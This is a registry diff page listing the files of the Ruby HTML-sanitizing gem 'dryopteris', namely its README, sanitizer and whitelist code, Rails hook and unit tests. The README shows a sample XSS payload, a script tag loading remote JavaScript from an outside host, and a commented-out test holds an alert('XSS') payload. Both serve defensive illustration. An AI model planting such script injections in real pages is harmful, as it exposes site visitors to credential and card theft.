RubyGems - jmcnevin-dryopteris - Versions diffs - 0.1.2 - Mend

jmcnevin-dryopteris 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

data/README.markdown +97 -0
data/VERSION.yml +4 -0
data/lib/dryopteris.rb +12 -0
data/lib/dryopteris/rails_extension.rb +46 -0
data/lib/dryopteris/sanitize.rb +175 -0
data/lib/dryopteris/whitelist.rb +159 -0
data/test/helper.rb +8 -0
data/test/html5/test_sanitizer.rb +185 -0
data/test/test_basic.rb +76 -0
data/test/test_strip_tags.rb +40 -0
metadata +77 -0

data/README.markdown ADDED Viewed

@@ -0,0 +1,97 @@
+Dryopteris
+==========
+Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
+* [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
+* [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
+Usage
+-----
+Let's say you run a web site, and you allow people to post HTML snippets.
+Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
+    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+Oooh, that could be bad. Here's how to fix it:
+    safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+Yeah, it's that easy.
+In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
+Sanitization Usage
+-----
+You're still here? Ok, let me tell you a little something about the two different methods of sanitizing the Dryopteris offers.
+### Fragments
+The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
+Usage is the same as above:
+    safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
+The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either socket or file, check out the next section on __Documents__).
+### Documents
+Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
+    safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
+The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
+Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...). Which makes it particularly easy to sanitize large numbers of docs.
+Whitewashing Usage
+-----
+### Whitewashing Fragments
+Other times, you may want to remove all styling, attributes and invalid HTML tags. I like to call this "whitewashing", since it's putting a new layer of paint on top of the HTML input to make it look nice.
+One use case for this feature is to clean up HTML that was cut-and-pasted from Microsoft(tm) Word into a WYSIWYG editor/textarea. Microsoft's editor is famous for injecting all kinds of cruft into its HTML output. Who needs that? Certainly not me.
+    whitewashed_html = Dryopteris.whitewash(ugly_microsoft_html_snippet)
+Please note that whitewashing implicitly also sanitizes your HTML, as it uses the same HTML tag whitelist as <tt>sanitize()</tt>. It's implementation is:
+ 1. unless the tag is on the whitelist, remove it from the document
+ 2. if the tag has an XML namespace on it, remove it from the document
+ 2. remove all attributes from the node
+### Whitewashing Documents
+Also note the existence of <tt>whitewash\_document</tt>, which is analogous to <tt>sanitize\_document</tt>.
+Standing on the Shoulders of Giants
+-----
+Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
+Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from [HTML5](http://code.google.com/p/html5lib/).
+Authors
+-----
+* [Bryan Helmkamp](http://www.brynary.com/)
+* [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
+Quotes About Dryopteris
+-----
+> "dryopteris shields you from xss attacks using nokogiri and NY attitude"
+>  - [hasmanyjosh](http://blog.hasmanythrough.com/)
+> "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
+>  - [catalystmediastudios](http://github.com/catalystmediastudios)

data/VERSION.yml ADDED Viewed

@@ -0,0 +1,4 @@
+---
+:major: 0
+:minor: 0
+:patch: 0

data/lib/dryopteris.rb ADDED Viewed

@@ -0,0 +1,12 @@
+$LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
+require 'rubygems'
+gem     'nokogiri', '>=1.2.4'
+require 'nokogiri'
+require "dryopteris/whitelist"
+require "dryopteris/sanitize"
+module Dryopteris
+  VERSION = '0.1'
+end

data/lib/dryopteris/rails_extension.rb ADDED Viewed

@@ -0,0 +1,46 @@
+require "dryopteris"
+module Dryopteris
+  module RailsExtension
+    def self.included(base)
+      base.extend(ClassMethods)
+      # sets up default of stripping tags for all fields
+      base.class_eval do
+        before_save :sanitize_fields
+        class_inheritable_reader :dryopteris_options
+      end
+    end
+    module ClassMethods
+      def sanitize_fields(options = {})
+        write_inheritable_attribute(:dryopteris_options, {
+          :except     => (options[:except] || []),
+          :allow_tags => (options[:allow_tags] || [])
+        })
+      end
+      alias_method :sanitize_field, :sanitize_fields
+    end
+    def sanitize_fields
+      self.class.columns.each do |column|
+        next unless (column.type == :string || column.type == :text)
+        field = column.name.to_sym
+        value = self[field]
+        if dryopteris_options && dryopteris_options[:except].include?(field)
+          next
+        elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
+          self[field] = Dryopteris.sanitize(value)
+        else
+          self[field] = Dryopteris.strip_tags(value)
+        end
+      end
+    end
+  end
+end

data/lib/dryopteris/sanitize.rb ADDED Viewed

@@ -0,0 +1,175 @@
+require 'cgi'
+module Dryopteris
+  class << self
+    def strip_tags(string_or_io, encoding=nil)
+      return nil if string_or_io.nil?
+      return "" if string_or_io.strip.size == 0
+      doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+      body_element = doc.at("/html/body")
+      return "" if body_element.nil?
+      body_element.inner_text
+    end
+    def whitewash(string, encoding=nil)
+      return nil if string.nil?
+      return "" if string.strip.size == 0
+      string = "<html><body>" + string + "</body></html>"
+      doc = Nokogiri::HTML.parse(string, nil, encoding)
+      body = doc.xpath("/html/body").first
+      return "" if body.nil?
+      body.children.each do |node|
+        traverse_conditionally_top_down(node, :whitewash_node)
+      end
+      body.children.map { |x| x.to_xml }.join
+    end
+    def whitewash_document(string_or_io, encoding=nil)
+      return nil if string_or_io.nil?
+      return "" if string_or_io.strip.size == 0
+      doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+      body = doc.xpath("/html/body").first
+      return "" if body.nil?
+      body.children.each do |node|
+        traverse_conditionally_top_down(node, :whitewash_node)
+      end
+      body.children.map { |x| x.to_xml }.join
+    end
+    def sanitize(string, encoding=nil)
+      return nil if string.nil?
+      return "" if string.strip.size == 0
+      string = "<html><body>" + string + "</body></html>"
+      doc = Nokogiri::HTML.parse(string, nil, encoding)
+      body = doc.xpath("/html/body").first
+      return "" if body.nil?
+      body.children.each do |node|
+        traverse_conditionally_top_down(node, :sanitize_node)
+      end
+      body.children.map { |x| x.to_xml }.join
+    end
+    def sanitize_document(string_or_io, encoding=nil)
+      return nil if string_or_io.nil?
+      return "" if string_or_io.strip.size == 0
+      doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+      elements = doc.xpath("/html/head/*","/html/body/*")
+      return "" if (elements.nil? || elements.empty?)
+      elements.each do |node|
+        traverse_conditionally_top_down(node, :sanitize_node)
+      end
+      doc.root.to_xml
+    end
+    private
+    def traverse_conditionally_top_down(node, method_name)
+      return if send(method_name, node)
+      node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
+    end
+    def remove_tags_from_node(node)
+      replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
+      node.add_next_sibling(replacement_killer)
+      node.remove
+      return true
+    end
+    def sanitize_node(node)
+      case node.type
+      when 1 # Nokogiri::XML::Node::ELEMENT_NODE
+        if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
+          node.attributes.each do |attr|
+            node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
+          end
+          node.attributes.each do |attr|
+            if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
+              # this block lifted nearly verbatim from HTML5 sanitization
+              val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
+              if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
+                node.remove_attribute(attr.first)
+              end
+            end
+          end
+          if node.attributes['style']
+            node['style'] = sanitize_css(node.attributes['style'])
+          end
+          return false
+        end
+      when 3 # Nokogiri::XML::Node::TEXT_NODE
+        return false
+      when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
+        return false
+      end
+      replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
+      node.add_next_sibling(replacement_killer)
+      node.remove
+      return true
+    end
+    def whitewash_node(node)
+      case node.type
+      when 1 # Nokogiri::XML::Node::ELEMENT_NODE
+        if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
+          node.attributes.each { |attr| node.remove_attribute(attr.first) }
+          has_no_namespaces = true
+          begin
+            has_no_namespaces = node.namespaces.empty?
+          rescue
+            # older versions of nokogiri raise an exception when there
+            # is a namespace on the node that is not declared with an href.
+            # see http://github.com/tenderlove/nokogiri/commit/395d7971304e1489e92c494b9c50609f4b4c4ab0
+            has_no_namespaces = false
+          end
+          return false if has_no_namespaces
+        end
+      when 3 # Nokogiri::XML::Node::TEXT_NODE
+        return false
+      when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
+        return false
+      end
+      node.remove
+      return true
+    end
+    #  this liftend nearly verbatim from html5
+    def sanitize_css(style)
+      # disallow urls
+      style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
+      # gauntlet
+      return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
+      return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
+      clean = []
+      style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
+        next if val.empty?
+        prop.downcase!
+        if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
+          clean << "#{prop}: #{val};"
+        elsif %w[background border margin padding].include?(prop.split('-')[0])
+          clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
+            HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
+              keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
+          end
+        elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
+          clean << "#{prop}: #{val};"
+        end
+      end
+      style = clean.join(' ')
+    end
+  end # self
+end

data/lib/dryopteris/whitelist.rb ADDED Viewed

@@ -0,0 +1,159 @@
+#
+#  HTML whitelist lifted from HTML5 sanitizer code
+#    http://code.google.com/p/html5lib/
+#
+module Dryopteris
+  module WhiteList
+    # <html5_license>
+    #
+    #   Copyright (c) 2006-2008 The Authors
+    #
+    #   Contributors:
+    #   James Graham - jg307@cam.ac.uk
+    #   Anne van Kesteren - annevankesteren@gmail.com
+    #   Lachlan Hunt - lachlan.hunt@lachy.id.au
+    #   Matt McDonald - kanashii@kanashii.ca
+    #   Sam Ruby - rubys@intertwingly.net
+    #   Ian Hickson (Google) - ian@hixie.ch
+    #   Thomas Broyer - t.broyer@ltgt.net
+    #   Jacques Distler - distler@golem.ph.utexas.edu
+    #   Henri Sivonen - hsivonen@iki.fi
+    #   The Mozilla Foundation (contributions from Henri Sivonen since 2008)
+    #
+    #   Permission is hereby granted, free of charge, to any person
+    #   obtaining a copy of this software and associated documentation
+    #   files (the "Software"), to deal in the Software without
+    #   restriction, including without limitation the rights to use, copy,
+    #   modify, merge, publish, distribute, sublicense, and/or sell copies
+    #   of the Software, and to permit persons to whom the Software is
+    #   furnished to do so, subject to the following conditions:
+    #
+    #   The above copyright notice and this permission notice shall be
+    #   included in all copies or substantial portions of the Software.
+    #
+    #   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+    #   EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+    #   MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+    #   NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+    #   HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+    #   WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+    #   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+    #   DEALINGS IN THE SOFTWARE.
+    #
+    # </html5_license>
+    ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
+      button caption center cite code col colgroup dd del dfn dir div dl dt
+      em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
+      legend li map menu ol optgroup option p pre q s samp select small span
+      strike strong sub sup table tbody td textarea tfoot th thead tr tt u
+      ul var]
+    MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
+      mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
+      msubsup msup mtable mtd mtext mtr munder munderover none]
+    SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
+      circle defs desc ellipse font-face font-face-name font-face-src g
+      glyph hkern image linearGradient line marker metadata missing-glyph
+      mpath path polygon polyline radialGradient rect set stop svg switch
+      text title tspan use]
+    ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
+      align alt axis border cellpadding cellspacing char charoff charset
+      checked cite class clear cols colspan color compact coords datetime
+      dir disabled enctype for frame headers height href hreflang hspace id
+      ismap label lang longdesc maxlength media method multiple name nohref
+      noshade nowrap prompt readonly rel rev rows rowspan rules scope
+      selected shape size span src start style summary tabindex target title
+      type usemap valign value vspace width xml:lang]
+    MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
+      columnalign columnlines columnspacing columnspan depth display
+      displaystyle equalcolumns equalrows fence fontstyle fontweight frame
+      height linethickness lspace mathbackground mathcolor mathvariant
+      mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
+      rowspacing rowspan rspace scriptlevel selection separator stretchy
+      width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
+    SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
+       arabic-form ascent attributeName attributeType baseProfile bbox begin
+       by calcMode cap-height class color color-rendering content cx cy d dx
+       dy descent display dur end fill fill-rule font-family font-size
+       font-stretch font-style font-variant font-weight from fx fy g1 g2
+       glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
+       ideographic k keyPoints keySplines keyTimes lang marker-end
+       marker-mid marker-start markerHeight markerUnits markerWidth
+       mathematical max min name offset opacity orient origin
+       overline-position overline-thickness panose-1 path pathLength points
+       preserveAspectRatio r refX refY repeatCount repeatDur
+       requiredExtensions requiredFeatures restart rotate rx ry slope stemh
+       stemv stop-color stop-opacity strikethrough-position
+       strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
+       stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
+       stroke-width systemLanguage target text-anchor to transform type u1
+       u2 underline-position underline-thickness unicode unicode-range
+       units-per-em values version viewBox visibility width widths x
+       x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
+       xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
+       xmlns:xlink y y1 y2 zoomAndPan]
+    ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
+    ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
+      border-bottom-color border-collapse border-color border-left-color
+      border-right-color border-top-color clear color cursor direction
+      display elevation float font font-family font-size font-style
+      font-variant font-weight height letter-spacing line-height overflow
+      pause pause-after pause-before pitch pitch-range richness speak
+      speak-header speak-numeral speak-punctuation speech-rate stress
+      text-align text-decoration text-indent unicode-bidi vertical-align
+      voice-family volume white-space width]
+    ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
+      brown center collapse dashed dotted fuchsia gray green !important
+      italic left lime maroon medium none navy normal nowrap olive pointer
+      purple red right solid silver teal top transparent underline white
+      yellow]
+    ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
+      stroke-width stroke-linecap stroke-linejoin stroke-opacity]
+    ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
+      telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
+    # subclasses may define their own versions of these constants
+    ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
+    ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
+    ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
+    ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
+    ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
+    ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
+    VOID_ELEMENTS = %w[
+      base
+      link
+      meta
+      hr
+      br
+      img
+      embed
+      param
+      area
+      col
+      input
+    ]
+  end
+  module HashedWhiteList
+    #  turn each of the whitelist arrays into a hash for faster lookup
+    WhiteList.constants.each do |constant|
+      next unless WhiteList.module_eval("#{constant}").is_a?(Array)
+      module_eval <<-CODE
+        #{constant} = {}
+        WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
+      CODE
+    end
+  end
+end

data/test/helper.rb ADDED Viewed

@@ -0,0 +1,8 @@
+require 'test/unit'
+require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
+if defined? Nokogiri::VERSION_INFO
+  puts "=> running with Nokogiri #{Nokogiri::VERSION_INFO.inspect}"
+else
+  puts "=> running with Nokogiri #{Nokogiri::VERSION} / libxml #{Nokogiri::LIBXML_PARSER_VERSION}"
+end

data/test/html5/test_sanitizer.rb ADDED Viewed

@@ -0,0 +1,185 @@
+#
+#  these tests taken from the HTML5 sanitization project and modified for use with Dryopteris
+#  see the original here: http://code.google.com/p/html5lib/source/browse/ruby/test/test_sanitizer.rb
+#
+#  license text at the bottom of this file
+#
+require File.expand_path(File.join(File.dirname(__FILE__), '..', 'helper'))
+class SanitizeTest < Test::Unit::TestCase
+  include Dryopteris
+  def sanitize_html stream
+    Dryopteris.sanitize(stream)
+  end
+  def sanitize_doc stream
+    Dryopteris.sanitize_document(stream)
+  end
+  def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+    #  libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
+    assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
+    doc = sanitize_doc(input).gsub(/"/,"'")
+    assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
+  end
+  WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+    define_method "test_should_allow_#{tag_name}_tag" do
+      input       = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
+      htmloutput  = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
+      xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
+      rexmloutput = xhtmloutput
+##
+##  these special cases are HTML5-tokenizer-dependent.
+##  libxml2 cleans up HTML differently, and I trust that.
+##
+#       if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
+#         htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+#         xhtmloutput = htmloutput
+#       elsif tag_name == 'col'
+#         htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+#         xhtmloutput = htmloutput
+#         rexmloutput = "<col title='1' />"
+#       elsif tag_name == 'table'
+#         htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
+#         xhtmloutput = htmloutput
+#       elsif tag_name == 'image'
+#         htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+#         xhtmloutput = htmloutput
+#         rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
+      if WhiteList::VOID_ELEMENTS.include?(tag_name)
+        if Nokogiri::LIBXML_VERSION <= "2.6.16"
+          htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+        else
+          htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+        end
+        xhtmloutput = htmloutput
+#        htmloutput += '<br/>' if tag_name == 'br'
+        rexmloutput =  "<#{tag_name} title='1' />"
+      end
+      check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+    end
+  end
+##
+##  libxml2 downcases tag names as it parses, so this is unnecessary.
+##
+#   WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+#     define_method "test_should_forbid_#{tag_name.upcase}_tag" do
+#       input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
+#       output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
+#       check_sanitization(input, output, output, output)
+#     end
+#   end
+  WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+    next if attribute_name == 'style'
+    next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
+    define_method "test_should_allow_#{attribute_name}_attribute" do
+      input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
+      output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+      htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+      check_sanitization(input, htmloutput, output, output)
+    end
+  end
+##
+##  libxml2 downcases attributes as it parses, so this is unnecessary.
+##
+#   WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+#     define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
+#       input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
+#       output =  "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+#       check_sanitization(input, output, output, output)
+#     end
+#   end
+  WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+    define_method "test_should_allow_#{protocol}_uris" do
+      input = %(<a href="#{protocol}">foo</a>)
+      output = "<a href='#{protocol}'>foo</a>"
+      check_sanitization(input, output, output, output)
+    end
+  end
+  WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+    define_method "test_should_allow_uppercase_#{protocol}_uris" do
+      input = %(<a href="#{protocol.upcase}">foo</a>)
+      output = "<a href='#{protocol.upcase}'>foo</a>"
+      check_sanitization(input, output, output, output)
+    end
+  end
+  if Nokogiri::LIBXML_VERSION > '2.6.16'
+    def test_should_handle_astral_plane_characters
+      input = "<p>&#x1d4b5; &#x1d538;</p>"
+      output = "<p>\360\235\222\265 \360\235\224\270</p>"
+      check_sanitization(input, output, output, output)
+      input = "<p><tspan>\360\235\224\270</tspan> a</p>"
+      output = "<p><tspan>\360\235\224\270</tspan> a</p>"
+      check_sanitization(input, output, output, output)
+    end
+  end
+# This affects only NS4. Is it worth fixing?
+#  def test_javascript_includes
+#    input = %(<div size="&{alert('XSS')}">foo</div>)
+#    output = "<div>foo</div>"
+#    check_sanitization(input, output, output, output)
+#  end
+  #html5_test_files('sanitizer').each do |filename|
+  #  JSON::parse(open(filename).read).each do |test|
+  #    define_method "test_#{test['name']}" do
+  #      check_sanitization(
+  #        test['input'],
+  #        test['output'],
+  #        test['xhtml'] || test['output'],
+  #        test['rexml'] || test['output']
+  #      )
+  #    end
+  #  end
+  #end
+end
+# <html5_license>
+#
+# Copyright (c) 2006-2008 The Authors
+#
+# Contributors:
+# James Graham - jg307@cam.ac.uk
+# Anne van Kesteren - annevankesteren@gmail.com
+# Lachlan Hunt - lachlan.hunt@lachy.id.au
+# Matt McDonald - kanashii@kanashii.ca
+# Sam Ruby - rubys@intertwingly.net
+# Ian Hickson (Google) - ian@hixie.ch
+# Thomas Broyer - t.broyer@ltgt.net
+# Jacques Distler - distler@golem.ph.utexas.edu
+# Henri Sivonen - hsivonen@iki.fi
+# The Mozilla Foundation (contributions from Henri Sivonen since 2008)
+#
+# Permission is hereby granted, free of charge, to any person
+# obtaining a copy of this software and associated documentation files
+# (the "Software"), to deal in the Software without restriction,
+# including without limitation the rights to use, copy, modify, merge,
+# publish, distribute, sublicense, and/or sell copies of the Software,
+# and to permit persons to whom the Software is furnished to do so,
+# subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be
+# included in all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
+# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
+# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+#
+# </html5_license>

data/test/test_basic.rb ADDED Viewed

@@ -0,0 +1,76 @@
+require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+class TestBasic < Test::Unit::TestCase
+  def test_nil
+    assert_nil Dryopteris.sanitize(nil)
+  end
+  def test_empty_string
+    assert_equal "", Dryopteris.sanitize("")
+  end
+  def test_removal_of_illegal_tag
+    html = <<-HTML
+      following this there should be no jim tag
+      <jim>jim</jim>
+      was there?
+    HTML
+    sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+    assert sane.xpath("//jim").empty?
+  end
+  def test_removal_of_illegal_attribute
+    html = "<p class=bar foo=bar abbr=bar />"
+    sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+    node = sane.xpath("//p").first
+    assert node.attributes['class']
+    assert node.attributes['abbr']
+    assert_nil node.attributes['foo']
+  end
+  def test_removal_of_illegal_url_in_href
+    html = <<-HTML
+      <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
+      <a href='http://jim.jim/'>this link should be fine</a>
+    HTML
+    sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+    nodes = sane.xpath("//a")
+    assert_nil nodes.first.attributes['href']
+    assert nodes.last.attributes['href']
+  end
+  def test_css_sanitization
+    html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
+    sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+    assert_match(/#000/, sane.inner_html)
+    assert_no_match(/foo\.com/, sane.inner_html)
+  end
+  def test_fragment_with_no_tags
+    assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
+  end
+  def test_fragment_in_p_tag
+    assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
+  end
+  def test_fragment_in_a_nontrivial_p_tag
+    assert_equal "  \n<p>This fragment is in a p.</p>", Dryopteris.sanitize("  \n<p foo='bar'>This fragment is in a p.</p>")
+  end
+  def test_fragment_in_p_tag_plus_stuff
+    assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
+  end
+  def test_fragment_with_text_nodes_leading_and_trailing
+    assert_equal "text<p>fragment</p>text", Dryopteris.sanitize("text<p>fragment</p>text")
+  end
+  def test_whitewash_on_fragment
+    html = "safe<frameset rows=\"*\"><frame src=\"http://example.com\"></frameset> <b>description</b>"
+    whitewashed = Dryopteris.whitewash_document(html)
+    assert_equal "<p>safe</p><b>description</b>", whitewashed
+  end
+end

data/test/test_strip_tags.rb ADDED Viewed

@@ -0,0 +1,40 @@
+require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+class TestStripTags < Test::Unit::TestCase
+  def test_nil
+    assert_nil Dryopteris.strip_tags(nil)
+  end
+  def test_empty_string
+    assert_equal Dryopteris.strip_tags(""), ""
+  end
+  def test_return_empty_string_when_nothing_left
+    assert_equal "", Dryopteris.strip_tags('<script>test</script>')
+  end
+  def test_removal_of_all_tags
+    html = <<-HTML
+      What's up <strong>doc</strong>?
+    HTML
+    stripped = Dryopteris.strip_tags(html)
+    assert_equal "What's up doc?".strip, stripped.strip
+  end
+  def test_dont_remove_whitespace
+    html = "Foo\nBar"
+    assert_equal html, Dryopteris.strip_tags(html)
+  end
+  def test_dont_remove_whitespace_between_tags
+    html = "<p>Foo</p>\n<p>Bar</p>"
+    assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
+  end
+  def test_removal_of_entities
+    html = "<p>this is &lt; that &quot;&amp;&quot; the other &gt; boo&apos;ya</p>"
+    assert_equal 'this is < that "&" the other > boo\'ya', Dryopteris.strip_tags(html)
+  end
+end

metadata ADDED Viewed

